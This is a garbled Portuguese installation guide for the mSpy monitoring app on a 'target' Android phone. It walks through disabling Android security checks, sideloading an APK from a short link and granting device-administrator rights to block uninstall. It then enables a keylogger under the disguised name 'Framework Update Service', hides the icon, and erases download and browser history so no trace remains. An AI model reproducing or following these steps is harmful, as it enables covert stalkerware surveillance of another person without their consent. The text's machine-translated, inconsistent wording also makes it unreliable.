Instalação nos dispositivos Android

Para instalar mSpy no dispositivo Android de destino é necessário ter o aparelho em suas mãos e uma conexão à Internet deve estar disponível.

É importante entender que, devido ao alto nível de personalização do sistema operacional Android, os passos seguintes podem variar dependendo do modelo do seu dispositivo. No entanto, a maioria dos menus são semelhantes e você será capaz de encontrá-los facilmente. Por exemplo, em vez de “Aplicações”, você pode ver “Apps”, “Gerenciador de Aplicativos” ou “Administrador de Aplicativos”.

Preparativos

Antes de iniciar a instalação, por favor, verifique o dispositivo de destino em Configurações → Segurança, há uma marca ao lado de fontes desconhecidas. Também é recomendado para remover a marca de verificação da Verificar aplicativos

Install1prt Install2prt Install3prt Install4prt

Nota: Na versão Android 5.0+ Verificar aplicativos opção está localizada em Google Configurações → Segurança

Portugues1 potrug2 portug3

Faça o download!

1. Na tela inicial abra todos os aplicativos (lista de todos os aplicativos disponíveis) e escolha um Chrome (recomenda)

Install5prt install6prt

2. Uma vez que você vê a página inicial do Chrome, deslize o dedo do meio da tela ligeiramente para baixo para fazer a barra de endereços aparecer na parte superior. Limpe http://b55y.net/a e clique Ir a partir do teclado. Depois disso, você terá que digitar o código para iniciar o download.

captcha1 captcha2 captcha3

Nota: http://b55y.net/a/ são um link para download direto que não abertura de novos sites, mas simplesmente faz o download começar na parte inferior (uma pequena mensagem deve emergir informando que o download é iniciado).

3. Agora você pode voltar para a para todos os apps da tela inicial e escolha Downloads onde você vai ver o arquivo bt.apk. Clique no arquivo bt.apk ea instalação começará.

Install10prt install11prt

Instale-lo!

1. Após abrir o arquivo a.apk tem que seguir a sequência: Proximo → Instalar → Abrir

install12prt install13prt install14prt

2. Depois de ler Acordo de Licença, deverá aceitá-lo para que proceder.

3. Deve ativar opção de prevenir a desinstalação.

4. Clique no botão “Ativar” para que prevenir a retirada do aplicativo e para que ativar “Administrador de dispositivo”.

5. Ative funcionamento de Keylogger, isso vai passar você para uma janela nova, clique em Framework Update Service e deve ativá-lo.

6. Ative “Permitir a coleta de dados” – isso vai passar você para a janela nova – clique em Framework Update Service – Permite “Acessar dados de uso”

7. Opte se quiser esconder o ícone ou não.

pt

Instalação completa!

Excluir histórico do navegador e um pacote de instalação

Agora você pode apagar o arquivo a.apk de downloads. Selecione o arquivo (ou toque e segure) e assinará o recipiente do lixo no topo. Toque para excluir o arquivo selecionado.

Install23prt install24prt

Você também pode apagar o histórico de navegação, girando o botão de navegador → Menu → Configurações → Segurança e Privacidade → Limpar histórico de navegação.

Install25prt install26prt install27prt install28prt
install29prt

E já não há qualquer vestígio do mSpy no dispositivo de destino!